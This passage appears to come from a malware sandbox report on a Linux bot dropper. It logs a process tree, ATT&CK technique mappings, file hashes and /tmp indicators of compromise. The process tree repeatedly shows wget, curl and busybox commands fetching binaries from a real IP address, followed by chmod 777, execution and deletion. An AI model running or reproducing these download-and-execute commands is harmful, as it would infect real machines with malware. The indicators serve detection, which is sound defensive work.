  wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:895
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:896
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:897
- /bin/chmod
  chmod 777 A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - File and Directory Permissions Modification
  PID:898
- /tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  ./A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Executes dropped EXE
  PID:899
- /bin/rm
  rm A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:900
- /usr/bin/wget
  wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:901
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:902
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:906
- /bin/chmod
  chmod 777 GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - File and Directory Permissions Modification
  PID:907
- /tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  ./GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Executes dropped EXE
  PID:908
- /bin/rm
  rm GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:909
- /usr/bin/wget
  wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:910

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm

Filesize
176B

MD5
e1732e70f015e99d14dff1eeeaec9966

SHA1
c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113

SHA256
6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e

SHA512
6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Download Submit

ioc	pid	Process
/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	683	HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	692	EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	698	UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	716	2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	731	urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	747	A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	768	I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	776	DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9	784	NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu	800	FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr	817	c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	830	GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN	836	8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	842	HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	849	HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	856	EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	862	UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	869	HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	875	I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	881	DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	887	2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	893	urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	899	A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	908	GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads